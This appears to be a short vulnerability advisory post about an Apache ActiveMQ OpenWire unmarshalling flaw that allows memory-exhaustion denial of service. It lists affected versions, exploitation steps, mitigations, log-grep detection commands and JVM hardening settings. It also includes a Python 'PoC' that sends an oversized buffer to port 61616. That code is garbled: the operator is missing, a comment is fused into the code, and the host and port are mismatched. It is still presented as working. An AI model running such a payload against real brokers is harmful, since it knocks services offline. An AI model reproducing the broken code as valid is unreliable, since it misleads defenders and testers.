The vulnerability in Apache ActiveMQ arises during the unmarshalling of OpenWire commands, where buffer size values are not properly validated. This lack of validation allows an attacker to craft malicious OpenWire messages with excessively large buffer size values, triggering uncontrolled memory allocation. When processed, these messages force the ActiveMQ broker to allocate disproportionate amounts of memory, leading to resource exhaustion.
Since the broker does not enforce mutual TLS by default, unauthenticated remote attackers can exploit this flaw to cause a denial of service (DoS) by overwhelming the system’s available memory. The issue impacts multiple versions of ActiveMQ, including 5.16.x before 5.16.8, 5.17.x before 5.17.7, 5.18.x before 5.18.7, and 6.x before 6.1.6.
DailyCVE Form:
Platform: Apache ActiveMQ
Version: <6.1.6, <5.18.7, <5.17.7, <5.16.8
Vulnerability: Memory exhaustion
Severity: Moderate
Date: May 7, 2025
What Undercode Say:
Exploitation:
- Craft malicious OpenWire message with oversized buffer length.
- Send payload to ActiveMQ broker via OpenWire protocol.
3. Trigger uncontrolled memory allocation, crashing the service.
PoC (Python Snippet):
import socket target = "activemq_server:61616" payload = b"\x00\x00\x00\xFF" + b"A" 0xFFFFFF Malicious size value s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, 61616)) s.send(payload)
Mitigation:
- Patch: Upgrade to ActiveMQ 6.1.6+, 5.18.7+, 5.17.7+, or 5.16.8+.
2. Workaround: Enforce mutual TLS for broker connections.
3. Monitoring: Detect abnormal memory spikes via:
grep 'java.lang.OutOfMemoryError' /opt/activemq/data/activemq.log
Detection Command:
netstat -tuln | grep 61616 Verify OpenWire exposure
Hardening Steps:
- Restrict OpenWire port (61616) to trusted IPs.
- Configure JVM memory limits in
activemq.conf:ACTIVEMQ_OPTS="-Xmx4G -XX:MaxRAMPercentage=70"
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
